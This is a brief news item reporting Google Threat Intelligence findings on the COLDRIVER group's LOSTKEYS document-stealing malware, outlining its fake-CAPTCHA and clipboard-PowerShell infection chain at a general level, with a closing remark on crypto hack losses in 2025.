Threat group COLDRIVER is employing a new malware known as LOSTKEYS to steal documents from Western targets, as reported by Google Threat Intelligence on May 7. This malware represents an evolution from simple credential phishing to more advanced attacks. The installation of LOSTKEYS occurs in four key steps: a lure website featuring a fake CAPTCHA, a PowerShell script downloaded to the user’s clipboard, evasion techniques to bypass detection, and the retrieval of the final payload. Once installed, LOSTKEYS can steal files based on hard-coded extensions and directories, as well as send system information and running process details back to COLDRIVER. The report highlights a significant surge in crypto hacks in 2025, with total losses reaching $2 billion in just the first quarter, underscoring the continued prevalence of operational flaws and social engineering tactics among attackers.

Source 🔗